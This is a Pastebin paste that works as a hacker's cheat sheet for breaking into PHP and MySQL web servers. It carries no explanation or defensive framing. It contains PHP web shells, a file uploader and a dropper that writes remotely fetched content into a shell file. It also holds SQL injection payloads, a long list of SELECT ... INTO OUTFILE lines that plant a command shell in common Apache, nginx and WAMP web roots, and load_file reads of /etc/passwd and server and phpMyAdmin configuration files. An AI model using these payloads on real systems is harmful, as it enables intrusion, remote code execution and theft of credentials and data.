Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // SiMPLE UPLOADER:
- <?php echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='filele' size='44'><input type='submit'></form>";@copy($_FILES['filele']['tmp_name'],$_FILES['filele']['name']);?>
- <?php fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i])); ?>
- cmd.php?o=shellname.php&i=shit.txt
- // CMD:
- <? system($_GET['c']); ?>
- // WEBSERVER iNFO:
- <? phpinfo(); ?>
- // SQL QUERY:
- <? ... $result = mysql_query($_GET['query']); … ?>
- ---
- GATHERiNG iNFORMATiONS:
- MySQL 4: 0′ UNION SELECT load_file(’a’),null/*
- MySQL 5: 0′ UNION SELECT @@datadir,null/*
- DB NAME: 0′ UNION SELECT database(),null/*
- ERROR..: 0′ AND 1=’0
- SELECT @@hostname;
- SELECT @@datadir;
- SELECT @@version;
- ---
- WAMP:
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/opt/lampp/htdocs/cmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/opt/lampp/phpmyadmin/cmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "C:\wamp\htdocs\cmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/opt/lampp/htdocs/xampp/cmd.php"
- DEDiCATED/TYPiCAL:
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/cmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/html/cmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/web1/html/cmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/sitename/htdocs/cmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/localhost/htdocs/cmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/vhosts/sitename/httpdocs/cmd.php"
- NGiNX:
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/etc/nginx/sites-available/default/cmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/usr/local/nginx/html/cmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/usr/share/nginx/html/cmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/usr/local/nginx/cmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/usr/nginx/htmlcmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/nginx-default/cmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/sitename/cmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/html/cmd.php"
- SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/home/wwwroot/default/cmd.php"
- ---
- SELECT load_file('/usr/local/nginx/conf/nginx.conf')
- SELECT load_file('/etc/init.d/nginx')
- SELECT load_file('/etc/passwd')
- SELECT load_file('/etc/networks')
- SELECT load_file('/etc/hosts')
- SELECT HEX(LOAD_FILE('/var/log/wtmp'))
- APACHE:
- SELECT load_file('/etc/init.d/apache')
- SELECT load_file('/etc/init.d/apache2')
- SELECT load_file('/etc/httpd/httpd.conf')
- SELECT load_file('/etc/apache/apache.conf')
- SELECT load_file('/etc/apache/httpd.conf')
- SELECT load_file('/etc/apache2/apache2.conf')
- SELECT load_file('/etc/apache2/httpd.conf')
- SELECT load_file('/usr/local/apache2/conf/httpd.conf')
- SELECT load_file('/usr/local/apache/conf/httpd.conf')
- SELECT load_file('/opt/apache/conf/httpd.conf')
- SELECT load_file('/home/apache/httpd.conf')
- SELECT load_file('/home/apache/conf/httpd.conf')
- SELECT load_file('/etc/apache2/sites-available/default')
- SELECT load_file('/etc/apache2/vhosts.d/default_vhost.include')
- PMA:
- SELECT load_file( '/phpmyadmin/config.inc.php' )
- ---
- SPLOiTZ:
- http://www.rapid7.com/db/modules/exploit/multi/http/phpmyadmin_preg_replace
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement